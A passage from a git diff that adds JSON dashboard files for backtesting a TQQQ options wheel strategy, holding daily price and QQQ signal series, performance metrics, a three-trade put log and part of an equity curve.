35.223731994628906 + ], + [ + "2025-05-28", + 34.771888732910156 + ], + [ + "2025-05-29", + 34.94070816040039 + ], + [ + "2025-05-30", + 34.75699234008789 + ], + [ + "2025-06-02", + 35.55640411376953 + ], + [ + "2025-06-03", + 36.38560485839844 + ], + [ + "2025-06-04", + 36.67856216430664 + ], + [ + "2025-06-05", + 35.824527740478516 + ], + [ + "2025-06-06", + 36.84737777709961 + ], + [ + "2025-06-09", + 37.011234283447266 + ], + [ + "2025-06-10", + 37.72623825073242 + ], + [ + "2025-06-11", + 37.33893966674805 + ], + [ + "2025-06-12", + 37.58224105834961 + ], + [ + "2025-06-13", + 36.16217041015625 + ], + [ + "2025-06-16", + 37.63685607910156 + ], + [ + "2025-06-17", + 36.524635314941406 + ], + [ + "2025-06-18", + 36.474979400634766 + ], + [ + "2025-06-20", + 35.973487854003906 + ], + [ + "2025-06-23", + 37.09067153930664 + ], + [ + "2025-06-24", + 38.778873443603516 + ], + [ + "2025-06-25", + 39.076629638671875 + ], + [ + "2025-06-26", + 40.147151947021484 + ], + [ + "2025-06-27", + 40.54050827026367 + ], + [ + "2025-06-30", + 41.32721710205078 + ], + [ + "2025-07-01", + 40.276607513427734 + ], + [ + "2025-07-02", + 41.07826232910156 + ], + [ + "2025-07-03", + 42.228450775146484 + ], + [ + "2025-07-07", + 41.287384033203125 + ], + [ + "2025-07-08", + 41.34215545654297 + ], + [ + "2025-07-09", + 42.19857406616211 + ], + [ + "2025-07-10", + 42.004390716552734 + ], + [ + "2025-07-11", + 41.68572235107422 + ], + [ + "2025-07-14", + 42.12887191772461 + ], + [ + "2025-07-15", + 42.23841094970703 + ], + [ + "2025-07-16", + 42.35791015625 + ], + [ + "2025-07-17", + 43.343788146972656 + ], + [ + "2025-07-18", + 43.19441604614258 + ], + [ + "2025-07-21", + 43.851661682128906 + ], + [ + "2025-07-22", + 43.169517517089844 + ], + [ + "2025-07-23", + 43.737144470214844 + ], + [ + "2025-07-24", + 44.025936126708984 + ], + [ + "2025-07-25", + 44.2748908996582 + ], + [ + "2025-07-28", + 44.70808410644531 + ], + [ + "2025-07-29", + 44.50393295288086 + ], + [ + "2025-07-30", + 44.658294677734375 + ], + [ + "2025-07-31", + 43.9213752746582 + ], + [ + "2025-08-01", + 41.287384033203125 + ], + [ + "2025-08-04", + 43.547935485839844 + ], + [ + "2025-08-05", + 42.6417236328125 + ], + [ + "2025-08-06", + 44.23506164550781 + ], + [ + "2025-08-07", + 44.68318557739258 + ], + [ + "2025-08-08", + 45.88814926147461 + ], + [ + "2025-08-11", + 45.48483657836914 + ], + [ + "2025-08-12", + 47.16282272338867 + ], + [ + "2025-08-13", + 47.23252868652344 + ], + [ + "2025-08-14", + 47.10307312011719 + ], + [ + "2025-08-15", + 46.43586349487305 + ], + [ + "2025-08-18", + 46.37611389160156 + ], + [ + "2025-08-19", + 44.48401641845703 + ], + [ + "2025-08-20", + 43.67241287231445 + ], + [ + "2025-08-21", + 43.0649528503418 + ], + [ + "2025-08-22", + 45.001853942871094 + ], + [ + "2025-08-25", + 44.608497619628906 + ], + [ + "2025-08-26", + 45.1263313293457 + ], + [ + "2025-08-27", + 45.330482482910156 + ], + [ + "2025-08-28", + 46.15702819824219 + ], + [ + "2025-08-29", + 44.49397659301758 + ], + [ + "2025-09-02", + 43.358726501464844 + ], + [ + "2025-09-03", + 44.36949920654297 + ], + [ + "2025-09-04", + 45.569480895996094 + ], + [ + "2025-09-05", + 45.7188606262207 + ], + [ + "2025-09-08", + 46.371131896972656 + ], + [ + "2025-09-09", + 46.749549865722656 + ], + [ + "2025-09-10", + 46.799339294433594 + ], + [ + "2025-09-11", + 47.58605194091797 + ], + [ + "2025-09-12", + 48.1785774230957 + ], + [ + "2025-09-15", + 49.40843200683594 + ], + [ + "2025-09-16", + 49.27399444580078 + ], + [ + "2025-09-17", + 48.96030807495117 + ], + [ + "2025-09-18", + 50.27979278564453 + ], + [ + "2025-09-19", + 51.27562713623047 + ], + [ + "2025-09-22", + 52.142005920410156 + ], + [ + "2025-09-23", + 51.09139633178711 + ], + [ + "2025-09-24", + 50.54216766357422 + ], + [ + "2025-09-25", + 49.864349365234375 + ], + [ + "2025-09-26", + 50.46242141723633 + ], + [ + "2025-09-29", + 51.13525390625 + ], + [ + "2025-09-30", + 51.53396987915039 + ], + [ + "2025-10-01", + 52.261627197265625 + ], + [ + "2025-10-02", + 52.899566650390625 + ], + [ + "2025-10-03", + 52.18187713623047 + ], + [ + "2025-10-06", + 53.34812545776367 + ], + [ + "2025-10-07", + 52.485904693603516 + ], + [ + "2025-10-08", + 54.265167236328125 + ], + [ + "2025-10-09", + 54.05085754394531 + ], + [ + "2025-10-10", + 48.37913513183594 + ], + [ + "2025-10-13", + 51.44924545288086 + ], + [ + "2025-10-14", + 50.40261459350586 + ], + [ + "2025-10-15", + 51.434288024902344 + ], + [ + "2025-10-16", + 50.861141204833984 + ], + [ + "2025-10-17", + 51.82802200317383 + ], + [ + "2025-10-20", + 53.771759033203125 + ], + [ + "2025-10-21", + 53.71194839477539 + ], + [ + "2025-10-22", + 52.132041931152344 + ], + [ + "2025-10-23", + 53.437835693359375 + ], + [ + "2025-10-24", + 55.102474212646484 + ], + [ + "2025-10-27", + 58.02804946899414 + ], + [ + "2025-10-28", + 59.35377502441406 + ], + [ + "2025-10-29", + 60.11133575439453 + ], + [ + "2025-10-30", + 57.36019515991211 + ], + [ + "2025-10-31", + 58.17258071899414 + ], + [ + "2025-11-03", + 58.97001266479492 + ], + [ + "2025-11-04", + 55.361637115478516 + ], + [ + "2025-11-05", + 56.43817138671875 + ], + [ + "2025-11-06", + 53.27336502075195 + ], + [ + "2025-11-07", + 52.72014617919922 + ], + [ + "2025-11-10", + 56.17401885986328 + ], + [ + "2025-11-11", + 55.710514068603516 + ], + [ + "2025-11-12", + 55.59588623046875 + ], + [ + "2025-11-13", + 52.161949157714844 + ], + [ + "2025-11-14", + 52.20181655883789 + ], + [ + "2025-11-17", + 50.861141204833984 + ], + [ + "2025-11-18", + 49.022064208984375 + ], + [ + "2025-11-19", + 49.864349365234375 + ], + [ + "2025-11-20", + 46.30082702636719 + ], + [ + "2025-11-21", + 47.327518463134766 + ], + [ + "2025-11-24", + 50.91596221923828 + ], + [ + "2025-11-25", + 51.84297180175781 + ], + [ + "2025-11-26", + 53.198604583740234 + ], + [ + "2025-11-28", + 54.36484909057617 + ], + [ + "2025-12-01", + 53.87642288208008 + ], + [ + "2025-12-02", + 55.12240982055664 + ], + [ + "2025-12-03", + 55.51115417480469 + ], + [ + "2025-12-04", + 55.331729888916016 + ], + [ + "2025-12-05", + 55.96968078613281 + ], + [ + "2025-12-08", + 55.62080383300781 + ], + [ + "2025-12-09", + 55.83012771606445 + ], + [ + "2025-12-10", + 56.468074798583984 + ], + [ + "2025-12-11", + 55.9298095703125 + ], + [ + "2025-12-12", + 52.65037155151367 + ], + [ + "2025-12-15", + 51.852943420410156 + ], + [ + "2025-12-16", + 52.161949157714844 + ], + [ + "2025-12-17", + 49.241355895996094 + ], + [ + "2025-12-18", + 51.34457778930664 + ], + [ + "2025-12-19", + 53.34812545776367 + ], + [ + "2025-12-22", + 54.075782775878906 + ], + [ + "2025-12-23", + 54.833335876464844 + ], + [ + "2025-12-24", + 55.26862335205078 + ], + [ + "2025-12-26", + 55.21870422363281 + ], + [ + "2025-12-29", + 54.40005874633789 + ], + [ + "2025-12-30", + 54.01070022583008 + ], + [ + "2025-12-31", + 52.63298034667969 + ], + [ + "2026-01-02", + 52.263587951660156 + ], + [ + "2026-01-05", + 53.51152420043945 + ], + [ + "2026-01-06", + 54.91919708251953 + ], + [ + "2026-01-07", + 55.07893371582031 + ], + [ + "2026-01-08", + 54.10055160522461 + ], + [ + "2026-01-09", + 55.6679573059082 + ], + [ + "2026-01-12", + 55.79774475097656 + ], + [ + "2026-01-13", + 55.50822448730469 + ], + [ + "2026-01-14", + 53.74114990234375 + ], + [ + "2026-01-15", + 54.29024124145508 + ], + [ + "2026-01-16", + 54.05063247680664 + ], + [ + "2026-01-20", + 50.646263122558594 + ], + [ + "2026-01-21", + 52.64296340942383 + ], + [ + "2026-01-22", + 53.811031341552734 + ], + [ + "2026-01-23", + 54.29024124145508 + ], + [ + "2026-01-26", + 54.98908615112305 + ], + [ + "2026-01-27", + 56.44667434692383 + ], + [ + "2026-01-28", + 56.965816497802734 + ], + [ + "2026-01-29", + 55.9474983215332 + ], + [ + "2026-01-30", + 53.910865783691406 + ], + [ + "2026-02-02", + 55.00904846191406 + ], + [ + "2026-02-03", + 52.43330764770508 + ], + [ + "2026-02-04", + 49.67786407470703 + ], + [ + "2026-02-05", + 47.561363220214844 + ], + [ + "2026-02-06", + 50.50649642944336 + ], + [ + "2026-02-09", + 51.654598236083984 + ], + [ + "2026-02-10", + 50.93578338623047 + ], + [ + "2026-02-11", + 51.31515884399414 + ], + [ + "2026-02-12", + 48.18033981323242 + ], + [ + "2026-02-13", + 48.38999557495117 + ], + [ + "2026-02-17", + 48.27019119262695 + ], + [ + "2026-02-18", + 49.308475494384766 + ], + [ + "2026-02-19", + 48.7494010925293 + ], + [ + "2026-02-20", + 49.97737121582031 + ], + [ + "2026-02-23", + 48.16037368774414 + ], + [ + "2026-02-24", + 49.69783020019531 + ], + [ + "2026-02-25", + 51.78438186645508 + ], + [ + "2026-02-26", + 49.967384338378906 + ], + [ + "2026-02-27", + 49.438262939453125 + ], + [ + "2026-03-02", + 49.61796569824219 + ], + [ + "2026-03-03", + 48.02060317993164 + ], + [ + "2026-03-04", + 50.17703628540039 + ], + [ + "2026-03-05", + 49.717796325683594 + ], + [ + "2026-03-06", + 47.46152877807617 + ], + [ + "2026-03-09", + 49.308475494384766 + ], + [ + "2026-03-10", + 49.318458557128906 + ], + [ + "2026-03-11", + 49.26853942871094 + ], + [ + "2026-03-12", + 46.75270462036133 + ], + [ + "2026-03-13", + 45.85418701171875 + ], + [ + "2026-03-16", + 47.38166046142578 + ], + [ + "2026-03-17", + 48.08050537109375 + ], + [ + "2026-03-18", + 46.023902893066406 + ], + [ + "2026-03-19", + 45.61458206176758 + ], + [ + "2026-03-20", + 43.00889205932617 + ], + [ + "2026-03-23", + 44.496429443359375 + ], + [ + "2026-03-24", + 43.547996520996094 + ], + [ + "2026-03-25", + 44.38999938964844 + ], + [ + "2026-03-26", + 41.22999954223633 + ], + [ + "2026-03-27", + 38.779998779296875 + ], + [ + "2026-03-30", + 37.88999938964844 + ], + [ + "2026-03-31", + 41.68000030517578 + ], + [ + "2026-04-01", + 43.22999954223633 + ], + [ + "2026-04-02", + 43.33000183105469 + ], + [ + "2026-04-06", + 44.099998474121094 + ], + [ + "2026-04-07", + 44.150001525878906 + ], + [ + "2026-04-08", + 48.0 + ], + [ + "2026-04-09", + 48.959999084472656 + ], + [ + "2026-04-10", + 49.16999816894531 + ], + [ + "2026-04-13", + 50.65999984741211 + ], + [ + "2026-04-14", + 53.40999984741211 + ], + [ + "2026-04-15", + 55.650001525878906 + ], + [ + "2026-04-16", + 56.43000030517578 + ], + [ + "2026-04-17", + 58.59000015258789 + ], + [ + "2026-04-20", + 58.08000183105469 + ], + [ + "2026-04-21", + 57.400001525878906 + ], + [ + "2026-04-22", + 60.209999084472656 + ], + [ + "2026-04-23", + 59.220001220703125 + ] + ], + "signal": [ + [ + "2025-04-24", + 465.09869384765625 + ], + [ + "2025-04-25", + 470.2835998535156 + ], + [ + "2025-04-28", + 470.1343688964844 + ], + [ + "2025-04-29", + 473.2393493652344 + ], + [ + "2025-04-30", + 473.1795959472656 + ], + [ + "2025-05-01", + 479.35968017578125 + ], + [ + "2025-05-02", + 486.4752502441406 + ], + [ + "2025-05-05", + 483.5892028808594 + ], + [ + "2025-05-06", + 479.09100341796875 + ], + [ + "2025-05-07", + 480.9718933105469 + ], + [ + "2025-05-08", + 485.9378662109375 + ], + [ + "2025-05-09", + 485.619384765625 + ], + [ + "2025-05-12", + 505.4036560058594 + ], + [ + "2025-05-13", + 513.1064453125 + ], + [ + "2025-05-14", + 516.1814575195312 + ], + [ + "2025-05-15", + 516.7486572265625 + ], + [ + "2025-05-16", + 518.9978637695312 + ], + [ + "2025-05-19", + 519.4954833984375 + ], + [ + "2025-05-20", + 517.7637329101562 + ], + [ + "2025-05-21", + 510.568603515625 + ], + [ + "2025-05-22", + 511.5240478515625 + ], + [ + "2025-05-23", + 506.7868957519531 + ], + [ + "2025-05-27", + 518.7091674804688 + ], + [ + "2025-05-28", + 516.4102783203125 + ], + [ + "2025-05-29", + 517.4254760742188 + ], + [ + "2025-05-30", + 516.609375 + ], + [ + "2025-06-02", + 520.6896362304688 + ], + [ + "2025-06-03", + 524.7599487304688 + ], + [ + "2025-06-04", + 526.2228393554688 + ], + [ + "2025-06-05", + 522.261962890625 + ], + [ + "2025-06-06", + 527.3673095703125 + ], + [ + "2025-06-09", + 528.1435546875 + ], + [ + "2025-06-10", + 531.6366577148438 + ], + [ + "2025-06-11", + 529.84521484375 + ], + [ + "2025-06-12", + 531.0892333984375 + ], + [ + "2025-06-13", + 524.421630859375 + ], + [ + "2025-06-16", + 531.7162475585938 + ], + [ + "2025-06-17", + 526.5313720703125 + ], + [ + "2025-06-18", + 526.4417724609375 + ], + [ + "2025-06-20", + 524.292236328125 + ], + [ + "2025-06-23", + 529.6832275390625 + ], + [ + "2025-06-24", + 537.7831420898438 + ], + [ + "2025-06-25", + 539.157958984375 + ], + [ + "2025-06-26", + 544.19921875 + ], + [ + "2025-06-27", + 546.0623779296875 + ], + [ + "2025-06-30", + 549.5992431640625 + ], + [ + "2025-07-01", + 544.9664306640625 + ], + [ + "2025-07-02", + 548.7623291015625 + ], + [ + "2025-07-03", + 554.1622924804688 + ], + [ + "2025-07-07", + 549.98779296875 + ], + [ + "2025-07-08", + 550.2966918945312 + ], + [ + "2025-07-09", + 554.192138671875 + ], + [ + "2025-07-10", + 553.3951416015625 + ], + [ + "2025-07-11", + 552.1497802734375 + ], + [ + "2025-07-14", + 554.15234375 + ], + [ + "2025-07-15", + 554.660400390625 + ], + [ + "2025-07-16", + 555.2283935546875 + ], + [ + "2025-07-17", + 559.7216186523438 + ], + [ + "2025-07-18", + 559.1836547851562 + ], + [ + "2025-07-21", + 562.0828857421875 + ], + [ + "2025-07-22", + 559.1737060546875 + ], + [ + "2025-07-23", + 561.7241821289062 + ], + [ + "2025-07-24", + 562.9197387695312 + ], + [ + "2025-07-25", + 564.2747802734375 + ], + [ + "2025-07-28", + 566.0382080078125 + ], + [ + "2025-07-29", + 565.1614990234375 + ], + [ + "2025-07-30", + 565.9186401367188 + ], + [ + "2025-07-31", + 562.9197387695312 + ], + [ + "2025-08-01", + 551.8309326171875 + ], + [ + "2025-08-04", + 562.0131225585938 + ], + [ + "2025-08-05", + 558.1973266601562 + ], + [ + "2025-08-06", + 565.2213134765625 + ], + [ + "2025-08-07", + 567.1340942382812 + ], + [ + "2025-08-08", + 572.4244995117188 + ], + [ + "2025-08-11", + 570.730712890625 + ], + [ + "2025-08-12", + 577.9041137695312 + ], + [ + "2025-08-13", + 578.193115234375 + ], + [ + "2025-08-14", + 577.7446899414062 + ], + [ + "2025-08-15", + 575.2042236328125 + ], + [ + "2025-08-18", + 574.9750366210938 + ], + [ + "2025-08-19", + 567.1739501953125 + ], + [ + "2025-08-20", + 563.8064575195312 + ], + [ + "2025-08-21", + 561.1962280273438 + ], + [ + "2025-08-22", + 569.85400390625 + ], + [ + "2025-08-25", + 568.210205078125 + ], + [ + "2025-08-26", + 570.4915771484375 + ], + [ + "2025-08-27", + 571.368408203125 + ], + [ + "2025-08-28", + 574.9451293945312 + ], + [ + "2025-08-29", + 568.2898559570312 + ], + [ + "2025-09-02", + 563.5275268554688 + ], + [ + "2025-09-03", + 567.9610595703125 + ], + [ + "2025-09-04", + 573.1019287109375 + ], + [ + "2025-09-05", + 573.9288940429688 + ], + [ + "2025-09-08", + 576.728515625 + ], + [ + "2025-09-09", + 578.3624267578125 + ], + [ + "2025-09-10", + 578.5517578125 + ], + [ + "2025-09-11", + 581.9192504882812 + ], + [ + "2025-09-12", + 584.4896850585938 + ], + [ + "2025-09-15", + 589.4910888671875 + ], + [ + "2025-09-16", + 588.992919921875 + ], + [ + "2025-09-17", + 587.8173828125 + ], + [ + "2025-09-18", + 593.11767578125 + ], + [ + "2025-09-19", + 597.1327514648438 + ], + [ + "2025-09-22", + 600.667724609375 + ], + [ + "2025-09-23", + 596.6779174804688 + ], + [ + "2025-09-24", + 594.583251953125 + ], + [ + "2025-09-25", + 592.0198364257812 + ], + [ + "2025-09-26", + 594.4535522460938 + ], + [ + "2025-09-29", + 597.20654296875 + ], + [ + "2025-09-30", + 598.8424072265625 + ], + [ + "2025-10-01", + 601.7150268554688 + ], + [ + "2025-10-02", + 604.188720703125 + ], + [ + "2025-10-03", + 601.645263671875 + ], + [ + "2025-10-06", + 606.1636962890625 + ], + [ + "2025-10-07", + 602.9718627929688 + ], + [ + "2025-10-08", + 609.8842163085938 + ], + [ + "2025-10-09", + 609.1461181640625 + ], + [ + "2025-10-10", + 588.0000610351562 + ], + [ + "2025-10-13", + 600.4782104492188 + ], + [ + "2025-10-14", + 596.4784545898438 + ], + [ + "2025-10-15", + 600.6876831054688 + ], + [ + "2025-10-16", + 598.46337890625 + ], + [ + "2025-10-17", + 602.393310546875 + ], + [ + "2025-10-20", + 609.9839477539062 + ], + [ + "2025-10-21", + 609.8244018554688 + ], + [ + "2025-10-22", + 603.9493408203125 + ], + [ + "2025-10-23", + 609.0264282226562 + ], + [ + "2025-10-24", + 615.52978515625 + ], + [ + "2025-10-27", + 626.4918823242188 + ], + [ + "2025-10-28", + 631.3095703125 + ], + [ + "2025-10-29", + 634.15234375 + ], + [ + "2025-10-30", + 624.45703125 + ], + [ + "2025-10-31", + 627.4694213867188 + ], + [ + "2025-11-03", + 630.4716796875 + ], + [ + "2025-11-04", + 617.67431640625 + ], + [ + "2025-11-05", + 621.6941528320312 + ], + [ + "2025-11-06", + 610.1136474609375 + ], + [ + "2025-11-07", + 608.1885375976562 + ], + [ + "2025-11-10", + 621.6442260742188 + ], + [ + "2025-11-11", + 619.9884643554688 + ], + [ + "2025-11-12", + 619.4996948242188 + ], + [ + "2025-11-13", + 606.8519897460938 + ], + [ + "2025-11-14", + 607.310791015625 + ], + [ + "2025-11-17", + 602.1240234375 + ], + [ + "2025-11-18", + 594.7926635742188 + ], + [ + "2025-11-19", + 598.3436279296875 + ], + [ + "2025-11-20", + 584.1797485351562 + ], + [ + "2025-11-21", + 588.568603515625 + ], + [ + "2025-11-24", + 603.6201782226562 + ], + [ + "2025-11-25", + 607.3407592773438 + ], + [ + "2025-11-26", + 612.70703125 + ], + [ + "2025-11-28", + 617.67431640625 + ], + [ + "2025-12-01", + 615.599609375 + ], + [ + "2025-12-02", + 620.4172973632812 + ], + [ + "2025-12-03", + 621.9334716796875 + ], + [ + "2025-12-04", + 621.35498046875 + ], + [ + "2025-12-05", + 623.8884887695312 + ], + [ + "2025-12-08", + 622.6915283203125 + ], + [ + "2025-12-09", + 623.4595336914062 + ], + [ + "2025-12-10", + 626.0130615234375 + ], + [ + "2025-12-11", + 623.98828125 + ], + [ + "2025-12-12", + 612.0586547851562 + ], + [ + "2025-12-15", + 608.9865112304688 + ], + [ + "2025-12-16", + 610.1934204101562 + ], + [ + "2025-12-17", + 598.8822631835938 + ], + [ + "2025-12-18", + 607.5601196289062 + ], + [ + "2025-12-19", + 615.47998046875 + ], + [ + "2025-12-22", + 618.4302368164062 + ], + [ + "2025-12-23", + 621.3265380859375 + ], + [ + "2025-12-24", + 623.144287109375 + ], + [ + "2025-12-26", + 623.1043090820312 + ], + [ + "2025-12-29", + 620.088134765625 + ], + [ + "2025-12-30", + 618.64990234375 + ], + [ + "2025-12-31", + 613.536376953125 + ], + [ + "2026-01-02", + 612.347900390625 + ], + [ + "2026-01-05", + 617.2117309570312 + ], + [ + "2026-01-06", + 622.6348876953125 + ], + [ + "2026-01-07", + 623.2341918945312 + ], + [ + "2026-01-08", + 619.6885986328125 + ], + [ + "2026-01-09", + 625.86083984375 + ], + [ + "2026-01-12", + 626.3801879882812 + ], + [ + "2026-01-13", + 625.4513549804688 + ], + [ + "2026-01-14", + 618.769775390625 + ], + [ + "2026-01-15", + 620.9970092773438 + ], + [ + "2026-01-16", + 620.4776611328125 + ], + [ + "2026-01-20", + 607.2942504882812 + ], + [ + "2026-01-21", + 615.50390625 + ], + [ + "2026-01-22", + 619.978271484375 + ], + [ + "2026-01-23", + 621.935791015625 + ], + [ + "2026-01-26", + 624.67236328125 + ], + [ + "2026-01-27", + 630.335205078125 + ], + [ + "2026-01-28", + 632.4225463867188 + ], + [ + "2026-01-29", + 628.6373291015625 + ], + [ + "2026-01-30", + 621.0868530273438 + ], + [ + "2026-02-02", + 625.3515014648438 + ], + [ + "2026-02-03", + 615.7435913085938 + ], + [ + "2026-02-04", + 604.9871826171875 + ], + [ + "2026-02-05", + 596.2781982421875 + ], + [ + "2026-02-06", + 608.8822631835938 + ], + [ + "2026-02-09", + 613.54638671875 + ], + [ + "2026-02-10", + 610.699951171875 + ], + [ + "2026-02-11", + 612.337890625 + ], + [ + "2026-02-12", + 599.8836059570312 + ], + [ + "2026-02-13", + 601.1619873046875 + ], + [ + "2026-02-17", + 600.542724609375 + ], + [ + "2026-02-18", + 605.027099609375 + ], + [ + "2026-02-19", + 602.7100219726562 + ], + [ + "2026-02-20", + 608.0433349609375 + ], + [ + "2026-02-23", + 600.652587890625 + ], + [ + "2026-02-24", + 607.1044921875 + ], + [ + "2026-02-25", + 615.9033813476562 + ], + [ + "2026-02-26", + 608.4727783203125 + ], + [ + "2026-02-27", + 606.5252075195312 + ], + [ + "2026-03-02", + 607.32421875 + ], + [ + "2026-03-03", + 600.8224487304688 + ], + [ + "2026-03-04", + 609.9808959960938 + ], + [ + "2026-03-05", + 608.1431274414062 + ], + [ + "2026-03-06", + 598.9946899414062 + ], + [ + "2026-03-09", + 606.99462890625 + ], + [ + "2026-03-10", + 607.004638671875 + ], + [ + "2026-03-11", + 606.9247436523438 + ], + [ + "2026-03-12", + 596.5078735351562 + ], + [ + "2026-03-13", + 592.9722900390625 + ], + [ + "2026-03-16", + 599.6239013671875 + ], + [ + "2026-03-17", + 602.5502319335938 + ], + [ + "2026-03-18", + 594.15087890625 + ], + [ + "2026-03-19", + 592.273193359375 + ], + [ + "2026-03-20", + 581.3269653320312 + ], + [ + "2026-03-23", + 588.0 + ], + [ + "2026-03-24", + 583.97998046875 + ], + [ + "2026-03-25", + 587.8200073242188 + ], + [ + "2026-03-26", + 573.7899780273438 + ], + [ + "2026-03-27", + 562.5800170898438 + ], + [ + "2026-03-30", + 558.280029296875 + ], + [ + "2026-03-31", + 577.1799926757812 + ], + [ + "2026-04-01", + 584.3099975585938 + ], + [ + "2026-04-02", + 584.97998046875 + ], + [ + "2026-04-06", + 588.5 + ], + [ + "2026-04-07", + 588.5900268554688 + ], + [ + "2026-04-08", + 606.0900268554688 + ], + [ + "2026-04-09", + 610.1900024414062 + ], + [ + "2026-04-10", + 611.0700073242188 + ], + [ + "2026-04-13", + 617.3900146484375 + ], + [ + "2026-04-14", + 628.5999755859375 + ], + [ + "2026-04-15", + 637.4000244140625 + ], + [ + "2026-04-16", + 640.469970703125 + ], + [ + "2026-04-17", + 648.8499755859375 + ], + [ + "2026-04-20", + 646.7899780273438 + ], + [ + "2026-04-21", + 644.3300170898438 + ], + [ + "2026-04-22", + 655.1099853515625 + ], + [ + "2026-04-23", + 651.4199829101562 + ] + ], + "metrics": { + "total_return": 5.458408550097382, + "final_value": 10545.84085500974, + "cagr": 5.477657356105814, + "sharpe": 2.031983303515009, + "max_dd": -0.6003518878697439, + "n_trades": 3, + "wins": 3, + "losses": 0, + "win_rate": 100.0, + "avg_win": 81.69156838518819, + "avg_loss": 0.0, + "chain_quotes": 0, + "bs_quotes": 21 + }, + "trade_log": [ + { + "date": "2025-11-26 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 41.65, + "spot": 53.198604583740234, + "premium": 2.066391470619516, + "close_cost": 0.9709011820930149, + "pnl": 103.56902885265012, + "hold_days": 5, + "result": "Win" + }, + { + "date": "2026-02-20 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 41.85, + "spot": 49.97737121582031, + "premium": 1.264905721711207, + "close_cost": 0.5412533437233309, + "pnl": 66.3852377987876, + "hold_days": 15, + "result": "Win" + }, + { + "date": "2026-04-06 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 34.13, + "spot": 44.099998474121094, + "premium": 1.4551086033202925, + "close_cost": 0.6441042182790238, + "pnl": 75.12043850412687, + "hold_days": 10, + "result": "Win" + } + ], + "underlying_ticker": "TQQQ", + "signal_ticker": "QQQ", + "style": "conservative" + }, + "start": "2025-04-24", + "end": "2026-04-24", + "_updated_at": "2026-04-24 18:50:05" +} \ No newline at end of file diff --git a/data/dashboard/wheel/tqqq_wheel_neutral_latest.json b/data/dashboard/wheel/tqqq_wheel_neutral_latest.json new file mode 100644 index 0000000..dc091b1 --- /dev/null +++ b/data/dashboard/wheel/tqqq_wheel_neutral_latest.json @@ -0,0 +1,6222 @@ +{ + "style": "neutral", + "result_payload": { + "equity": [ + [ + "2025-04-24", + 10001.173037138344 + ], + [ + "2025-04-25", + 10002.3462118783 + ], + [ + "2025-04-28", + 10003.519524236011 + ], + [ + "2025-04-29", + 10004.692974227619 + ], + [ + "2025-04-30", + 10005.866561869268 + ], + [ + "2025-05-01", + 10007.040287177108 + ], + [ + "2025-05-02", + 10008.214150167285 + ], + [ + "2025-05-05", + 10009.38815085595 + ], + [ + "2025-05-06", + 10010.562289259256 + ], + [ + "2025-05-07", + 10011.736565393358 + ], + [ + "2025-05-08", + 10012.910979274411 + ], + [ + "2025-05-09", + 10014.085530918574 + ], + [ + "2025-05-12", + 10015.260220342007 + ], + [ + "2025-05-13", + 10016.435047560872 + ], + [ + "2025-05-14", + 10017.610012591333 + ], + [ + "2025-05-15", + 10018.785115449555 + ], + [ + "2025-05-16", + 10019.960356151707 + ], + [ + "2025-05-19", + 10021.135734713958 + ], + [ + "2025-05-20", + 10022.31125115248 + ], + [ + "2025-05-21", + 10023.486905483445 + ], + [ + "2025-05-22", + 10024.66269772303 + ], + [ + "2025-05-23", + 10025.83862788741 + ], + [ + "2025-05-27", + 10027.014695992766 + ], + [ + "2025-05-28", + 10028.19090205528 + ], + [ + "2025-05-29", + 10029.367246091131 + ], + [ + "2025-05-30", + 10030.543728116507 + ], + [ + "2025-06-02", + 10031.720348147594 + ], + [ + "2025-06-03", + 10032.89710620058 + ], + [ + "2025-06-04", + 10034.074002291656 + ], + [ + "2025-06-05", + 10035.251036437016 + ], + [ + "2025-06-06", + 10036.428208652851 + ], + [ + "2025-06-09", + 10037.605518955359 + ], + [ + "2025-06-10", + 10038.782967360738 + ], + [ + "2025-06-11", + 10039.960553885187 + ], + [ + "2025-06-12", + 10041.138278544908 + ], + [ + "2025-06-13", + 10042.316141356107 + ], + [ + "2025-06-16", + 10043.494142334986 + ], + [ + "2025-06-17", + 10044.672281497757 + ], + [ + "2025-06-18", + 10045.850558860626 + ], + [ + "2025-06-20", + 10047.028974439807 + ], + [ + "2025-06-23", + 10048.20752825151 + ], + [ + "2025-06-24", + 10049.386220311953 + ], + [ + "2025-06-25", + 10050.565050637353 + ], + [ + "2025-06-26", + 10051.744019243928 + ], + [ + "2025-06-27", + 10052.923126147898 + ], + [ + "2025-06-30", + 10054.102371365487 + ], + [ + "2025-07-01", + 10055.28175491292 + ], + [ + "2025-07-02", + 10056.461276806422 + ], + [ + "2025-07-03", + 10057.640937062224 + ], + [ + "2025-07-07", + 10058.820735696554 + ], + [ + "2025-07-08", + 10060.000672725646 + ], + [ + "2025-07-09", + 10061.180748165734 + ], + [ + "2025-07-10", + 10062.360962033054 + ], + [ + "2025-07-11", + 10063.541314343844 + ], + [ + "2025-07-14", + 10064.721805114343 + ], + [ + "2025-07-15", + 10065.902434360793 + ], + [ + "2025-07-16", + 10067.083202099438 + ], + [ + "2025-07-17", + 10068.264108346526 + ], + [ + "2025-07-18", + 10069.4451531183 + ], + [ + "2025-07-21", + 10070.626336431013 + ], + [ + "2025-07-22", + 10071.807658300915 + ], + [ + "2025-07-23", + 10072.98911874426 + ], + [ + "2025-07-24", + 10074.170717777304 + ], + [ + "2025-07-25", + 10075.352455416301 + ], + [ + "2025-07-28", + 10076.534331677512 + ], + [ + "2025-07-29", + 10077.7163465772 + ], + [ + "2025-07-30", + 10078.898500131623 + ], + [ + "2025-07-31", + 10080.080792357048 + ], + [ + "2025-08-01", + 10081.263223269743 + ], + [ + "2025-08-04", + 10082.445792885976 + ], + [ + "2025-08-05", + 10083.628501222016 + ], + [ + "2025-08-06", + 10084.811348294137 + ], + [ + "2025-08-07", + 10085.994334118612 + ], + [ + "2025-08-08", + 10087.177458711718 + ], + [ + "2025-08-11", + 10088.360722089732 + ], + [ + "2025-08-12", + 10089.544124268934 + ], + [ + "2025-08-13", + 10090.727665265607 + ], + [ + "2025-08-14", + 10091.911345096036 + ], + [ + "2025-08-15", + 10093.095163776503 + ], + [ + "2025-08-18", + 10094.279121323298 + ], + [ + "2025-08-19", + 10095.463217752711 + ], + [ + "2025-08-20", + 10093.657453081032 + ], + [ + "2025-08-21", + 10085.143201777977 + ], + [ + "2025-08-22", + 10114.051335236374 + ], + [ + "2025-08-25", + 10119.239229812742 + ], + [ + "2025-08-26", + 10129.182457863533 + ], + [ + "2025-08-27", + 10135.0484675557 + ], + [ + "2025-08-28", + 10144.676766272769 + ], + [ + "2025-08-29", + 10141.247506755944 + ], + [ + "2025-09-02", + 10147.449630413497 + 